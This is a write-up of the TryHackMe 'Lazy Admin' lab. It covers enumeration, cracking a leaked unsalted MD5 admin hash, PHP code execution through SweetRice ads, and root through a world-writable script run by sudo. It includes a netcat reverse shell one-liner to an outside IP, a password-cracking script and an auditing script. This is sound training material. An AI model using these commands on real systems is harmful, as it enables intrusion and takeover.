Tryhackme | Lazy Admin

FarisArch
3 min read · May 1, 2021


What’s worse than an admin? A lazy admin! This is an easy-level TryHackMe room that exploits bad practices and weak passwords.


Tasks

  • user.txt
  • root.txt

Vulnerability

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Gobuster

/content (Status: 301) [Size: 310]
/index.html (Status: 200) [Size: 11321]
/server-status (Status: 403) [Size: 275]

The default Apache page tells us very little, so we need to enumerate /content further.

Further Enumeration

/.hta (Status: 403) [Size: 275]
/.hta.html (Status: 403) [Size: 275]
/.hta.php (Status: 403) [Size: 275]
/.hta.txt (Status: 403) [Size: 275]
/.htaccess (Status: 403) [Size: 275]
/.htaccess.html (Status: 403) [Size: 275]
/.htaccess.php (Status: 403) [Size: 275]
/.htaccess.txt (Status: 403) [Size: 275]
/.htpasswd (Status: 403) [Size: 275]
/.htpasswd.html (Status: 403) [Size: 275]
/.htpasswd.php (Status: 403) [Size: 275]
/.htpasswd.txt (Status: 403) [Size: 275]
/_themes (Status: 301) [Size: 318]
/as (Status: 301) [Size: 313]
/attachment (Status: 301) [Size: 321]
/changelog.txt (Status: 200) [Size: 18013]
/images (Status: 301) [Size: 317]
/inc (Status: 301) [Size: 314]
/index.php (Status: 200) [Size: 2196]
/js (Status: 301) [Size: 313]
/license.txt (Status: 200) [Size: 15410]
  • /as leads to a login page.
  • /inc is a browsable directory listing that contains a backup folder.
  • /changelog.txt reveals that the CMS is SweetRice version 1.5.1.

Possible credentials in the .sql backup file

'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');'
  • The row is a PHP-serialized settings array: the `admin` key holds the admin username, `manager`, and the `passwd` key holds the hash 42f749ade7f9e195bf475f37a44cafcb.
  • hashid identifies the 32-character hex hash as most likely MD5 (or a related MD variant).
  • Looking it up on crackstation.net gives the plaintext Password123; the hash is unsalted, so a precomputed lookup resolves it instantly.
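The two steps above, pulling the admin username and password hash out of the serialized `global_setting` row and then running a dictionary attack on the unsalted MD5, as an added Python example (not code from the original writeup). The serialized blob below is a shortened, constructed copy of the dump above that keeps only the relevant keys, and the small wordlist stands in for CrackStation's lookup table; the parser handles only the PHP types SweetRice actually uses (s, i, b, N, a).

```python
import hashlib

# Constructed sample: a shortened copy of the serialized `global_setting` row
# from the SweetRice SQL backup. Only the keys relevant to the writeup are
# kept; the real blob on the box has 17 entries.
SAMPLE_GLOBAL_SETTING = (
    'a:4:{s:4:"name";s:25:"Lazy Admin&#039;s Website";'
    's:5:"admin";s:7:"manager";'
    's:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb";'
    's:5:"close";i:1;}'
)

# Constructed wordlist standing in for CrackStation's precomputed table.
SAMPLE_WORDLIST = ["admin", "password", "letmein", "Password123", "P@ssw0rd"]


def php_unserialize(data: str):
    """Minimal PHP unserialize() for the types SweetRice stores: s, i, b, N, a."""
    value, _ = _parse(data, 0)
    return value


def _parse(data: str, pos: int):
    """Parse one value starting at pos; return (value, position after it)."""
    kind = data[pos]
    if kind == "N":                        # N;
        return None, pos + 2
    if kind in "ib":                       # i:123;  or  b:1;
        end = data.index(";", pos)
        num = int(data[pos + 2:end])
        return (bool(num) if kind == "b" else num), end + 1
    if kind == "s":                        # s:len:"bytes";
        colon = data.index(":", pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                  # skip the :" before the payload
        # PHP lengths are byte counts; the sample is ASCII so chars == bytes.
        value = data[start:start + length]
        return value, start + length + 2   # skip the closing ";
    if kind == "a":                        # a:count:{key;value;...}
        colon = data.index(":", pos + 2)
        count = int(data[pos + 2:colon])
        cur = colon + 2                    # skip the :{
        result = {}
        for _ in range(count):
            key, cur = _parse(data, cur)
            val, cur = _parse(data, cur)
            result[key] = val
        return result, cur + 1             # skip the closing }
    raise ValueError(f"unsupported PHP type {kind!r} at offset {pos}")


def extract_admin_credentials(serialized: str):
    """Return (username, md5_hex) from the admin/passwd keys of the settings row."""
    settings = php_unserialize(serialized)
    return settings["admin"], settings["passwd"]


def crack_md5(target_hex: str, wordlist):
    """Dictionary attack on an unsalted MD5: hash each candidate and compare.

    With no salt, every installation that picked the same password shares
    the same hash, which is why a public lookup table finds it at once.
    """
    target_hex = target_hex.lower()
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None


if __name__ == "__main__":
    user, digest = extract_admin_credentials(SAMPLE_GLOBAL_SETTING)
    print(f"admin user: {user}  passwd hash: {digest}")
    print("cracked:", crack_md5(digest, SAMPLE_WORDLIST))
```

Running it prints the username `manager` and recovers `Password123` from the hash; the same `php_unserialize` can be pointed at the full 17-key row from the dump once the SQL escaping (`\\"` and `\'`) has been undone.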

Foothold

  • We can log in at /as with the user manager and the password Password123.
  • Searching for SweetRice 1.5.1 turns up a public exploit that abuses the Ads feature: the ad body is written to a .php file under the web root, so any PHP placed in an ad executes on the server.
  • We create an ad containing a PHP reverse shell from the Ads menu. Check out pentestmonkey's php-reverse-shell for a ready-made payload.
  • Requesting the generated ad file triggers the script and returns a reverse shell to our listener on port 4444.

Privesc

  • As www-data we can enter itguy’s home directory.
  • user.txt and mysql_login.txt are in that directory.
  • mysql_login.txt contains credentials for rice.
  • www-data cannot create a script file in the home directory.
  • However, www-data is allowed to run backup.pl through sudo as root. The script is tiny:
#!/usr/bin/perl

system("sh", "/etc/copy.sh");
  • The script simply runs /etc/copy.sh. www-data has no write permission on backup.pl itself, but look at copy.sh:
-rw-r--rwx 1 root root 81 Nov 29  2019 copy.sh
  • copy.sh is world-writable (-rw-r--rwx), and because backup.pl runs as root through sudo, whatever we put in copy.sh runs as root too.
  • vi, vim and nano do not work in the non-interactive shell, so we write to the file with a shell redirect (echo ... > /etc/copy.sh) instead.
  • copy.sh already contains a reverse shell one-liner:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
  • Change the host and port to our attacking machine, start a listener, and trigger the script through the sudo rule:
sudo /usr/bin/perl /home/itguy/backup.pl
  • With the IP address and port pointed at our listener, we get a root shell on port 9999.
  • root.txt is in /root.
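The privilege escalation rests on a general pattern: a script that runs as root (backup.pl, through the sudo rule) calls a file that a low-privileged user can overwrite (/etc/copy.sh, mode -rw-r--rwx). The following Python script, added here and not part of the original writeup, audits that pattern generically. It pulls the absolute paths a script references, applies the POSIX owner/group/other write check for a given uid and gid, and reports which dependencies could be hijacked. Everything it inspects is constructed in a temporary directory: a copy.sh with the exact mode seen on the box, a sanely permissioned helper.sh for contrast, and a backup.pl that calls both. Using uid/gid 33 for www-data is an assumption (that is the Ubuntu default).

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in a script. Constructed for this example; it covers
# the system("sh", "/etc/copy.sh") form in backup.pl as well as bare `sh /path`.
ABS_PATH = re.compile(r"(/[\w./-]+)")


def referenced_paths(script_text: str):
    """Return the distinct absolute paths a script's text refers to, sorted."""
    return sorted(set(ABS_PATH.findall(script_text)))


def writable_by(st: os.stat_result, uid: int, gid: int) -> bool:
    """POSIX write check: owner bits if we own it, else group bits, else other."""
    if uid == 0:
        return True
    mode = st.st_mode
    if st.st_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid == gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def hijackable_dependencies(script_path: str, uid: int, gid: int):
    """Regular files referenced by script_path that (uid, gid) may overwrite.

    If script_path itself runs as root (here: via the sudo rule on backup.pl),
    every entry returned is a root shell waiting to happen: write the payload
    into the dependency instead of the protected script, then trigger the script.
    """
    with open(script_path) as fh:
        text = fh.read()
    findings = []
    for path in referenced_paths(text):
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        if stat.S_ISREG(st.st_mode) and writable_by(st, uid, gid):
            findings.append((path, oct(stat.S_IMODE(st.st_mode))))
    return findings


def build_lab(tmpdir: str) -> str:
    """Constructed replica of the room's files; returns the path of backup.pl."""
    copy_sh = os.path.join(tmpdir, "copy.sh")
    helper_sh = os.path.join(tmpdir, "helper.sh")
    backup_pl = os.path.join(tmpdir, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/sh\necho 'backup'\n")
    os.chmod(copy_sh, 0o647)      # -rw-r--rwx, exactly what ls -l showed on the box
    with open(helper_sh, "w") as fh:
        fh.write("#!/bin/sh\n")
    os.chmod(helper_sh, 0o755)    # -rwxr-xr-x, a sane mode for contrast
    with open(backup_pl, "w") as fh:
        fh.write(f'#!/usr/bin/perl\n\nsystem("sh", "{copy_sh}");\n'
                 f'system("sh", "{helper_sh}");\n')
    return backup_pl


def run_demo():
    """Audit the replica as www-data (uid/gid 33, assumed) and return basenames."""
    with tempfile.TemporaryDirectory() as tmp:
        findings = hijackable_dependencies(build_lab(tmp), uid=33, gid=33)
        return [(os.path.basename(p), mode) for p, mode in findings]


if __name__ == "__main__":
    for name, mode in run_demo():
        print(f"[!] {name} ({mode}) is writable by uid 33 and executed by a root-run script")
```

On the target you would call `hijackable_dependencies("/home/itguy/backup.pl", os.getuid(), os.getgid())` from the www-data shell; the demo only reproduces the layout locally. The fix on the admin side is the mirror image of the check: nothing a sudo-permitted script touches may be writable by the user the rule is granted to.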
